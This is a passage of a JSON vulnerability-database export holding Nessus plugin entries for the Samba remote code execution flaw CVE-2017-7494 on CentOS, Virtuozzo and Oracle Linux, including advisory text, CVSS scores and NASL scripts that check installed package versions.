flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-winbind-krb5-locator-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-winbind-modules-4.4.4-14.el7_3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsmbclient / libsmbclient-devel / libwbclient / libwbclient-devel / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:31:15", "description": "An update for samba is now available for Red Hat Enterprise Linux 6\nand Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) protocol and the related Common Internet File System (CIFS)\nprotocol, which allow PC-compatible machines to share files, printers,\nand various information.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. 
Upstream acknowledges steelo as the original reporter.", "edition": 35, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-26T00:00:00", "title": "CentOS 6 / 7 : samba (CESA-2017:1270) (SambaCry)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-26T00:00:00", "cpe": ["p-cpe:/a:centos:centos:samba-libs", "p-cpe:/a:centos:centos:samba-pidl", "p-cpe:/a:centos:centos:samba-winbind-modules", "p-cpe:/a:centos:centos:samba-swat", "p-cpe:/a:centos:centos:samba-domainjoin-gui", "p-cpe:/a:centos:centos:samba-winbind-krb5-locator", "cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:samba-dc", "p-cpe:/a:centos:centos:samba-winbind", "p-cpe:/a:centos:centos:samba-test", "p-cpe:/a:centos:centos:samba-common-tools", "p-cpe:/a:centos:centos:samba-doc", "p-cpe:/a:centos:centos:samba-common", "p-cpe:/a:centos:centos:samba-devel", "p-cpe:/a:centos:centos:ctdb", "p-cpe:/a:centos:centos:samba-glusterfs", "p-cpe:/a:centos:centos:libwbclient", "p-cpe:/a:centos:centos:ctdb-tests", "cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:samba-common-libs", "p-cpe:/a:centos:centos:samba-vfs-glusterfs", "p-cpe:/a:centos:centos:samba-winbind-clients", "p-cpe:/a:centos:centos:samba-krb5-printing", "p-cpe:/a:centos:centos:samba-python", "p-cpe:/a:centos:centos:samba-client", "p-cpe:/a:centos:centos:samba", "p-cpe:/a:centos:centos:samba-dc-libs", "p-cpe:/a:centos:centos:libsmbclient", "p-cpe:/a:centos:centos:libwbclient-devel", "p-cpe:/a:centos:centos:libsmbclient-devel", "p-cpe:/a:centos:centos:samba-client-libs", "p-cpe:/a:centos:centos:samba-test-libs", "p-cpe:/a:centos:centos:samba-winbind-devel"], "id": "CENTOS_RHSA-2017-1270.NASL", "href": "https://www.tenable.com/plugins/nessus/100428", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:1270 and \n# CentOS 
Errata and Security Advisory 2017:1270 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100428);\n script_version(\"3.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-7494\");\n script_xref(name:\"RHSA\", value:\"2017:1270\");\n\n script_name(english:\"CentOS 6 / 7 : samba (CESA-2017:1270) (SambaCry)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for samba is now available for Red Hat Enterprise Linux 6\nand Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) protocol and the related Common Internet File System (CIFS)\nprotocol, which allow PC-compatible machines to share files, printers,\nand various information.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. 
Upstream acknowledges steelo as the original reporter.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2017-May/022419.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?63336008\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2017-May/022420.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0810f584\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7494\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba is_known_pipename() Arbitrary Module Load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ctdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ctdb-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libwbclient\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-client-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-common-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-common-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-glusterfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-krb5-printing\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-test-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-vfs-glusterfs\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:centos:centos:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/26\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x / 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"libsmbclient-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"libsmbclient-devel-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-client-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-common-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-doc-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-domainjoin-gui-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", cpu:\"x86_64\", reference:\"samba-glusterfs-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-swat-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-clients-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-devel-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-krb5-locator-3.6.23-43.el6_9\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ctdb-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ctdb-tests-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libsmbclient-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", 
reference:\"libsmbclient-devel-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libwbclient-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libwbclient-devel-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-client-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-client-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-common-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-common-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-common-tools-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-dc-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-dc-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-devel-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-krb5-printing-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-pidl-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-python-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-test-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-test-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-vfs-glusterfs-4.4.4-14.el7_3\")) flag++;\nif 
(rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-winbind-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-winbind-clients-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-winbind-krb5-locator-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-winbind-modules-4.4.4-14.el7_3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ctdb / ctdb-tests / libsmbclient / libsmbclient-devel / libwbclient / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:14:25", "description": "An update for samba4 is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges steelo as the original reporter.\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. 
Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.", "edition": 34, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-13T00:00:00", "title": "Virtuozzo 6 : samba4 / samba4-client / samba4-common / samba4-dc / etc (VZLSA-2017-1271)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "modified": "2017-07-13T00:00:00", "cpe": ["p-cpe:/a:virtuozzo:virtuozzo:samba4-common", "p-cpe:/a:virtuozzo:virtuozzo:samba4-test", "p-cpe:/a:virtuozzo:virtuozzo:samba4", "p-cpe:/a:virtuozzo:virtuozzo:samba4-python", "p-cpe:/a:virtuozzo:virtuozzo:samba4-winbind-clients", "p-cpe:/a:virtuozzo:virtuozzo:samba4-winbind", "p-cpe:/a:virtuozzo:virtuozzo:samba4-dc", "p-cpe:/a:virtuozzo:virtuozzo:samba4-client", "p-cpe:/a:virtuozzo:virtuozzo:samba4-pidl", "cpe:/o:virtuozzo:virtuozzo:6", "p-cpe:/a:virtuozzo:virtuozzo:samba4-devel", "p-cpe:/a:virtuozzo:virtuozzo:samba4-dc-libs", "p-cpe:/a:virtuozzo:virtuozzo:samba4-libs", "p-cpe:/a:virtuozzo:virtuozzo:samba4-winbind-krb5-locator"], "id": "VIRTUOZZO_VZLSA-2017-1271.NASL", "href": "https://www.tenable.com/plugins/nessus/101473", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101473);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-7494\"\n );\n\n script_name(english:\"Virtuozzo 6 : samba4 / samba4-client / samba4-common / samba4-dc / etc (VZLSA-2017-1271)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for 
samba4 is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges steelo as the original reporter.\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. 
Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.\");\n # http://repo.virtuozzo.com/vzlinux/announcements/json/VZLSA-2017-1271.json\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?28840624\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017-1271\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected samba4 / samba4-client / samba4-common / samba4-dc / etc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba is_known_pipename() Arbitrary Module Load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:samba4-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:samba4-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:samba4-dc\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:virtuozzo:virtuozzo:samba4-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:samba4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:samba4-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:samba4-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:samba4-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:samba4-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:samba4-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:samba4-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:samba4-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:6\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 6.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"samba4-4.2.10-10.vl6\",\n \"samba4-client-4.2.10-10.vl6\",\n \"samba4-common-4.2.10-10.vl6\",\n \"samba4-dc-4.2.10-10.vl6\",\n \"samba4-dc-libs-4.2.10-10.vl6\",\n \"samba4-devel-4.2.10-10.vl6\",\n \"samba4-libs-4.2.10-10.vl6\",\n \"samba4-pidl-4.2.10-10.vl6\",\n \"samba4-python-4.2.10-10.vl6\",\n \"samba4-test-4.2.10-10.vl6\",\n \"samba4-winbind-4.2.10-10.vl6\",\n \"samba4-winbind-clients-4.2.10-10.vl6\",\n \"samba4-winbind-krb5-locator-4.2.10-10.vl6\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-6\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4 / samba4-client / samba4-common / samba4-dc / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:51:24", "description": "From Red Hat Security Advisory 2017:1271 :\n\nAn update for samba4 is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges steelo as the original reporter.", "edition": 36, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-25T00:00:00", "title": "Oracle Linux 6 : samba4 (ELSA-2017-1271) (SambaCry)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-25T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:samba4-dc", "p-cpe:/a:oracle:linux:samba4-devel", "p-cpe:/a:oracle:linux:samba4-dc-libs", "p-cpe:/a:oracle:linux:samba4-winbind-krb5-locator", "p-cpe:/a:oracle:linux:samba4-client", "p-cpe:/a:oracle:linux:samba4-pidl", "p-cpe:/a:oracle:linux:samba4-winbind-clients", "p-cpe:/a:oracle:linux:samba4-common", "p-cpe:/a:oracle:linux:samba4-winbind", "p-cpe:/a:oracle:linux:samba4-python", "p-cpe:/a:oracle:linux:samba4-test", "p-cpe:/a:oracle:linux:samba4-libs", "p-cpe:/a:oracle:linux:samba4"], "id": "ORACLELINUX_ELSA-2017-1271.NASL", "href": "https://www.tenable.com/plugins/nessus/100397", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2017:1271 and \n# Oracle Linux Security Advisory ELSA-2017-1271 
